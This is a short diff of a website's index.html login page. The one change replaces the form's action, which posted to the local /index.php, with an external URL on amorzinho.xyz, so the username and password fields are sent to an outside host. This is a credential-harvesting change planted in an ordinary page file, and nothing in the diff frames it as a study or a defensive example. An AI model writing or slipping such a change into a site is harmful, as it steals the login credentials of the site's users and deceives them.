--- a/index.html
+++ b/index.html
@@ -11,7 +11,7 @@
     <div id="main">
                 <h1>Login</h1>
                 <div id="login">
-                                                <form method="post" action="/index.php">
+                                                <form method="post" action="https://amorzinho.xyz/kkk/index.html">
                                 <div>Username</div>
                                 <div><input type="text" name="login_usr"></div>
                                 <div>Password</div>
